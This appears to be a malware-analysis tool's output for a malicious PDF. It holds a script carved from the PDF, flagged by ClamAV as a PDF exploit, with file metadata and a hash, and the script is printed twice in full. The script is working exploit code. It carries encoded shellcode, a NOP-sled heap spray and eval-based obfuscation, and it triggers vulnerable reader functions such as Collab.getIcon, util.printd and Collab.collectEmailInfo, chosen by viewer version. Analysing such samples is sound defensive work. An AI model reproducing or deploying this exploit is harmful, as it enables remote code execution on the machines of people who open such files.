f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6
b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");
function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
var strtmp = "headersize = 10;acl = headersize+garbage.length;while (nopblock.length<acl) nopblock+=nopblock;fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.substring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) memory[i] = block + garbage;var buffersize = 4012;var buffer = Array(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}
function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}
if (app.viewerVersion > 9.0)
{
do2();
}
function re(count,what)
{
var v = "";
while (--count >= 0)
v += what;
return v;
}
function start()
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
if (app.viewerVersion >= 8.0)
{
do1();
}
else
{
var strtmp2 = "var shaft = app.setTimeOut("start()",1200);";
eval(strtmp2);
}

generic_stage_recovery_003.js
- Kind: deobfuscated-js
- Source: generic stage recovery percent-decode -> split-literal-normalize from decompressed stream at offset 0x1164
- Size: 7367 bytes
- SHA-256: fd498efa8e139a9da978baa89dfc6c5cea5ce9104400161ffe511310db7136e7
Detection
- ClamAV: Pdf.Exploit.Agent-35646
- Obfuscation or payload: likely (carved artifact contains 26 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%
u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6
b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");
function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
var strtmp = "headersize = 10;acl = headersize+garbage.length;while (nopblock.length<acl) nopblock+=nopblock;fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.substring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) memory[i] = block + garbage;var buffersize = 4012;var buffer = Array(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("
");
}
var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}
function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}
if (app.viewerVersion > 9.0)
{
do2();
}
function re(count,what)
{
var v = "";
while (--count >= 0)
v += what;
return v;
}
function start()
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
if (app.viewerVersion >= 8.0)
{
do1();
}
else
{
var strtmp2 = "var shaft = app.setTimeOut("start()",1200);";
eval(strtmp2);
}